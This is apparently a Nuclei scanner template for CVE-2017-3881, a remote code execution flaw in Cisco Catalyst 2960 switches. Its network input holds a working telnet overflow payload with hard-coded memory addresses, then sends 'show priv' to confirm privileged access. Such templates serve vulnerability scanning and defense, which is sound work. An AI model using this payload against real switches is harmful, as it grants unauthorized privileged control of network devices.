id: CVE-2017-3881 info: name: Cisco IOS 12.2(55)SE11 Remote Code Execution author: dwisiswant0 severity: critical reference: - https://github.com/artkond/cisco-rce - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent. tags: cve,cve2017,cisco,rce,network classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2017-3881 cwe-id: CWE-20 network: - inputs: - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}" read: 1024 - data: "show priv" read: 1024 host: - "{{Hostname}}" - "{{Host}}:23" read-size: 1024 matchers: - type: word words: - "Current privilege level is"